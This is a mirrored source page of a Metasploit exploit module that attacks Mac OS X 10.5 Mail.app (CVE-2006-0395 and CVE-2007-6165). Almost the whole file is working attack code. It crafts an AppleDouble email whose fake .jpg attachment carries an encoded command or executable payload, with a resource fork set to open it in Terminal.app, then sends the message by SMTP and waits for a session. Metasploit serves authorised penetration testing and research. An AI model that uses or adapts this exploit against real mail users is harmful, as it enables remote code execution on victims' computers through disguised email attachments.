Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/email/mailapp_image_exec.rb
36557 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking

8


9
  #

10
  # This module sends email messages via smtp

11
  #

12
  include Msf::Exploit::Remote::SMTPDeliver

13
  include Msf::Exploit::EXE

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Mail.app Image Attachment Command Execution',

20
        'Description' => %q{

21
          This module exploits a command execution vulnerability in the

22
          Mail.app application shipped with Mac OS X 10.5.0. This flaw was

23
          patched in 10.4 in March of 2007, but reintroduced into the final

24
          release of 10.5.

25
        },

26
        'License' => MSF_LICENSE,

27
        'Author' => ['hdm', 'kf'],

28
        'References' => [

29
          ['CVE', '2006-0395'],

30
          ['CVE', '2007-6165'],

31
          ['OSVDB', '40875'],

32
          ['BID', '26510'],

33
          ['BID', '16907']

34
        ],

35
        'Stance' => Msf::Exploit::Stance::Passive,

36
        'Payload' => {

37
          'Space' => 8192,

38
          'DisableNops' => true,

39
          'BadChars' => '',

40
          'Compat' =>

41
              {

42
                'ConnectionType' => '-bind -find'

43
              }

44
        },

45
        'Targets' => [

46
          [

47
            'Mail.app - Command Payloads',

48
            {

49
              'Platform' => 'unix',

50
              'Arch' => ARCH_CMD,

51
              'PayloadCompat' => {

52
                'RequiredCmd' => 'generic perl ruby bash-tcp telnet'

53
              }

54
            }

55
          ],

56
          [

57
            'Mail.app - Binary Payloads (x86)',

58
            {

59
              'Platform' => 'osx',

60
              'Arch' => ARCH_X86

61
            }

62
          ],

63
          [

64
            'Mail.app - Binary Payloads (ppc)',

65
            {

66
              'Platform' => 'osx',

67
              'Arch' => ARCH_PPC

68
            }

69
          ],

70
        ],

71
        'DisclosureDate' => '2006-03-01',

72
        'Notes' => {

73
          'Reliability' => UNKNOWN_RELIABILITY,

74
          'Stability' => UNKNOWN_STABILITY,

75
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

76
        }

77
      )

78
    )

79
  end

80


81
  def autofilter

82
    false

83
  end

84


85
  def exploit

86
    exts = ['jpg']

87


88
    gext = exts[rand(exts.length)]

89
    name = rand_text_alpha(5) + ".#{gext}"

90
    rand_text_alpha(rand(1..32))

91


92
    msg = Rex::MIME::Message.new

93
    msg.mime_defaults

94
    msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(1..32))

95
    msg.to = datastore['MAILTO']

96
    msg.from = datastore['MAILFROM']

97


98
    dbl = Rex::MIME::Message.new

99
    dbl.header.set('Content-Type', "multipart/appledouble;\r\n    boundary=#{dbl.bound}")

100
    dbl.header.set('Content-Disposition', 'inline')

101


102
    # AppleDouble file version 2

103
    # 3 entries - 'Finder Info', 'Real name', 'Resource Fork'

104
    # Real Name matches msf random generated 5 character name - (I cheated ala gsub)

105


106
    resfork =

107
      "AAUWBwACAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAJAAAAPgAAAAoAAAADAAAASAAAAAkAAAACAAAA\r\n" +

108
      "UQAABToAAAAAAAAAAAAASGVpc2UuanBnAAABAAAABQgAAAQIAAAAMgAAAAAAAAAAAAAAAAAAAAAA\r\n" +

109
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

110
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

111
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

112
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQA\r\n" +

113
      "AAAlL0FwcGxpY2F0aW9ucy9VdGlsaXRpZXMvVGVybWluYWwuYXBwAOzs7P/s7Oz/7Ozs/+zs7P/s\r\n" +

114
      "7Oz/7Ozs/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/5ubm/+bm5v/m5ub/5ubm/+bm\r\n" +

115
      "5v/m5ub/5ubm/+bm5v/p6en/6enp/+np6f/p6en/6enp/+np6f/p6en/6enp/+zs7P/s7Oz/7Ozs\r\n" +

116
      "/+zs7P/s7Oz/7Ozs/+zs7P/s7Oz/7+/v/+/v7//v7+//7+/v/+/v7//v7+//7+/v/+/v7//z8/P/\r\n" +

117
      "8/Pz//Pz8//z8/P/8/Pz//Pz8//z8/P/8/Pz//b29v/29vb/9vb2//b29v/29vb/9vb2//b29v/2\r\n" +

118
      "9vb/+Pj4//j4+P/4+Pj/+Pj4//j4+P/4+Pj/+Pj4//j4+P/8/Pz//Pz8//z8/P/8/Pz//Pz8//z8\r\n" +

119
      "/P/8/Pz//Pz8////////////////////////////////////////////////////////////////\r\n" +

120
      "/////////////////////6gAAACoAAAAqAAAAKgAAACoAAAAqAAAAKgAAACoAAAAKgAAACoAAAAq\r\n" +

121
      "AAAAKgAAACoAAAAqAAAAKgAAACoAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAADAAAAAwAAAAAA\r\n" +

122
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

123
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

124
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

125
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

126
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

127
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

128
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

129
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

130
      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

131
      'AAAAAQAAAAUIAAAECAAAADIAX9CsEsIAAAAcADIAAHVzcm8AAAAKAAD//wAAAAABDSF8' + "\r\n"

132


133
    fork = Rex::Text.encode_base64(Rex::Text.decode_base64(resfork).gsub('Heise.jpg', name), "\r\n")

134


135
    cid = "<#{rand_text_alpha(rand(16..31))}@#{rand_text_alpha(rand(1..16))}.com>"

136


137
    cmd = ''

138


139
    if (target.arch.include?(ARCH_CMD))

140
      cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")

141
    else

142
      bin = generate_payload_exe

143
      cmd = Rex::Text.encode_base64(bin, "\r\n")

144
    end

145


146
    dbl.add_part(fork, "application/applefile;\r\n    name=\"#{name}\"", 'base64', "inline;\r\n    filename=#{name}")

147
    dbl.add_part(cmd, "image/jpeg;\r\n    x-mac-type=0;\r\n    x-unix-mode=0755;\r\n    x-mac-creator=0;\r\n    name=\"#{name}\"", "base64\r\nContent-Id: #{cid}", "inline;\r\n    filename=#{name}")

148


149
    msg.parts << dbl

150


151
    send_message(msg.to_s)

152


153
    print_status('Waiting for a payload session (backgrounding)...')

154
  end

155
end

156


157